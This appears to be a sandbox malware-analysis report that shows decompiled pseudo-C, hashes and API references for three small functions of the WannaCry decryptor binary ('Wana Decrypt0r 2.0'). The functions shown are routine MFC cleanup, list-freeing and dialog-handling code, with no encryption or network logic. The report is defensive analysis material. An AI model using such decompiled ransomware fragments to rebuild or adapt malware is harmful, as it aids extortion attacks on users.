                                  Similarity
                                  • API ID: #2414$#641#800
                                  • String ID:
                                  • API String ID: 2580907805-0
                                  • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                  • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}










                                  0x00404170
                                  0x00404172
                                  0x00404177
                                  0x0040417d
                                  0x0040417e
                                  0x0040418c
                                  0x00404190
                                  0x00404196
                                  0x0040419e
                                  0x004041a1
                                  0x004041a5
                                  0x004041ad
                                  0x004041b2
                                  0x004041ba
                                  0x004041c0
                                  0x004041c5
                                  0x004041cd
                                  0x004041d2
                                  0x004041d9
                                  0x004041e1
                                  0x004041ec
                                  0x004041f6

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                  • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#2414#795
                                  • String ID:
                                  • API String ID: 932896513-0
                                  • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                  • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}










                                  0x00402e00
                                  0x00402e06
                                  0x00402e0e
                                  0x00402e7a
                                  0x00402e7a
                                  0x00402e7e
                                  0x00402e82
                                  0x00402e10
                                  0x00402e14
                                  0x00402e14
                                  0x00402e16
                                  0x00402e1d
                                  0x00402e24
                                  0x00402e27
                                  0x00402e2c
                                  0x00402e2e
                                  0x00402e33
                                  0x00402e43
                                  0x00402e44
                                  0x00402e49
                                  0x00402e39
                                  0x00402e3b
                                  0x00402e3b
                                  0x00402e33
                                  0x00402e4c
                                  0x00402e4d
                                  0x00402e50
                                  0x00402e53
                                  0x00402e56
                                  0x00402e62
                                  0x00402e68
                                  0x00402e68
                                  0x00402e6d
                                  0x00402e73
                                  0x00402e77
                                  0x00402e77

                                  APIs
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825
                                  • String ID: j'@
                                  • API String ID: 41483190-370697233
                                  • Opcode ID: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                  • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                  • Opcode Fuzzy Hash: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                  • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}





                                  0x00407650
                                  0x0040765c
                                  0x00407675
                                  0x00407677
                                  0x0040767f
                                  0x00407688
                                  0x0040768d
                                  0x0040767f
                                  0x00407692
                                  0x00407698
                                  0x0040765e
                                  0x00407660
                                  0x00407667
                                  0x0040766d
                                  0x0040766d

                                  APIs
                                  • #2379.MFC42 ref: 00407692
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • #2379.MFC42(00000001), ref: 00407667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$time
                                  • String ID: Wana Decrypt0r 2.0
                                  • API String ID: 2017816395-4201229886
                                  • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                  • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                  Uniqueness

                                  Uniqueness Score: -1.00%